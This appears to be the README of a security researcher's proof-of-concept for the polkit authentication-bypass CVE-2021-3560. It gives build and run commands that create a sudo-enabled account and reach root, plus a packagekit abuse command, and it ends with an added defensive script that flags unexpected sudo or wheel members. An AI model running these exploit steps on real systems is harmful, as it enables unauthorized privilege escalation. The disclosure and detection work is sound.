This directory contains a proof of concept exploit for CVE-2021-3560: an authentication bypass vulnerability in polkit.
The vulnerability is described in this blog post.
Instructions for building the PoC:
    git submodule update --init  # Download https://github.com/kevinbackhouse/DBusParse
    mkdir build
    cd build
    cmake ..
    make

The PoC exploits an authentication bypass vulnerability in polkit
to create a new user account with sudo privileges.
Note: if the PoC is run in a graphical session such as GNOME, then it
will cause the dialog box for the authentication agent to pop up
repeatedly, which is very annoying and also prevents the PoC from
working. That is why the first step in the instructions below is
ssh localhost.
    ssh localhost
    cd build
    ./createuser /var/run/dbus/system_bus_socket boris iaminvincible!

Assuming that the PoC is successful, there should now be a user named
boris:

    $ id boris
    uid=1008(boris) gid=1008(boris) groups=1008(boris),27(sudo)

You can now log in as boris, using the password "iaminvincible!":

    su - boris  # password: iaminvincible!

And since boris is a member of the sudo group, you can now escalate
privileges to root.
The createuser PoC depends on two packages being installed:
accountsservice and gnome-control-center. Those packages might not
be installed on some systems, such as a non-graphical RHEL server.
However, the polkit vulnerability can also be used to exploit
packagekit, which means that we
can use the vulnerability to install accountsservice and
gnome-control-center.
You can run the packagekit PoC like this:

    ./installpackage /var/run/dbus/system_bus_socket gnome-control-center
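As an added defensive check that is not part of this repository, the following Python script audits /etc/passwd and /etc/group contents for accounts in the sudo or wheel group that are not on an expected baseline, which is exactly the artifact the createuser PoC leaves behind. The sample data is constructed to mirror the `id boris` output above; the PRIVILEGED_GROUPS set and the baseline are assumptions for the example.

```python
# Added example (not part of the PoC repository): a defender-side audit that
# parses /etc/passwd and /etc/group text and flags accounts holding sudo or
# wheel membership that are not on an expected baseline. The sample data
# below is constructed to mirror the "id boris" output described above.
from typing import Dict, List, Optional, Set, Tuple

PRIVILEGED_GROUPS = {"sudo", "wheel"}  # assumption: groups that grant root

def parse_passwd(text: str) -> Dict[str, int]:
    """Map user name -> uid from /etc/passwd-formatted text."""
    users: Dict[str, int] = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) >= 3:
            users[fields[0]] = int(fields[2])
    return users

def parse_group(text: str) -> Dict[str, Set[str]]:
    """Map group name -> set of supplementary members from /etc/group text."""
    groups: Dict[str, Set[str]] = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) >= 4:
            groups[fields[0]] = {m for m in fields[3].split(",") if m}
    return groups

def unexpected_admins(passwd_text: str, group_text: str,
                      baseline: Set[str]) -> List[Tuple[str, Optional[int], str]]:
    """Return (user, uid, group) for privileged-group members not in baseline."""
    users = parse_passwd(passwd_text)
    groups = parse_group(group_text)
    findings = []
    for gname in sorted(PRIVILEGED_GROUPS & groups.keys()):
        for member in sorted(groups[gname]):
            if member not in baseline:
                findings.append((member, users.get(member), gname))
    return findings

# Constructed sample: one legitimate admin plus the account the PoC creates.
SAMPLE_PASSWD = ("root:x:0:0:root:/root:/bin/bash\n"
                 "alice:x:1000:1000::/home/alice:/bin/bash\n"
                 "boris:x:1008:1008::/home/boris:/bin/bash\n")
SAMPLE_GROUP = "root:x:0:\nsudo:x:27:alice,boris\nalice:x:1000:\nboris:x:1008:\n"
BASELINE = {"alice"}  # assumption: the admins you expect on this host

if __name__ == "__main__":
    for user, uid, group in unexpected_admins(SAMPLE_PASSWD, SAMPLE_GROUP, BASELINE):
        print(f"unexpected {group} member: {user} (uid {uid})")
```

On a real host, read the two files and compare against the baseline you keep in configuration management; any new sudo or wheel member that was not provisioned deliberately warrants investigation.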